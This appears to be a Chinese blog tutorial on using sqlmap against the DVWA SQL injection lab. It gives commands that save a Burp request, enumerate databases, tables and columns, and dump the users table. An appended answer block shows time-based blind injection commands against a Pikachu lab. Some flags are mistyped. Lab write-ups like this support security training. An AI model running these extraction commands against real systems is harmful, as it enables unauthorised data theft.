Sqlmap实验

我们直接看到dvwa的SQL Injection模块

我们已经知道这个题存在SQL注入,那么直接上sqlmap进行测试

先使用burp抓取一个提交查询的数据包。

保存为123.txt。然后使用sqlmap进行注入:

命令如下sqlmap -r 123.txt —-data=id --batch (-r参数是指定一个文件―data是指定我们要进行sql注入的参数,--batch意思是选择默认参数)

结果如下图所示:已经确定这个注入点。

使用下面命令列出数据库的库名

sqlmap -r 123.txt —-data=id --batch - dbs

存在5个数据库,我们选择dvwa数据库,使用下面的命令列出dvwa数据库中的表名

sqlmap -r 123.txt —-data=id --batch -D dvwa —-tables

获得user表,再通过下面命令列出dvwa数据库下,users表中的列名sqlmap -r 123.txt --data=id --batch -D dvwa -T users -columns

使用sqlmap -r 123.txt --data=id --batch -D dvwa -T users -dump语句能查看所有users表中内容

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
回答: SQLMap是一款常用的自动化SQL注入工具,可以用于检测和利用Web应用程序中的SQL注入漏洞。时间盲注是其中一种注入技术,它通过不断地观察响应时间的变化来判断注入语句的真假。在使用SQLMap进行时间盲注时,可以使用以下命令来指定目标URL和保存进度的日志文件: sqlmap -u "http://url/news?id=1" --dbs -o "sqlmap.log"(指定目标URL并将数据库的结果保存到"sqlmap.log"文件中) 如果需要恢复已保存的进度,可以使用以下命令: sqlmap -u "http://url/news?id=1" --dbs -o "sqlmap.log" --resume(恢复已保存的进度) 如果想要查看当前信息,可以使用以下命令: sqlmap -u "http://192.168.241.1/pikachu/vul/sqli/sqli_blind_b.php?name=11&submit=查询"(查看当前信息) 要查看当前数据库,可以使用以下命令: sqlmap -u "http://192.168.241.1/pikachu/vul/sqli/sqli_blind_b.php?name=11&submit=查询" --current-db(查看当前数据库)<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [Sqlmap使用-盲注小实验](https://blog.csdn.net/weixin_50339832/article/details/117537417)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值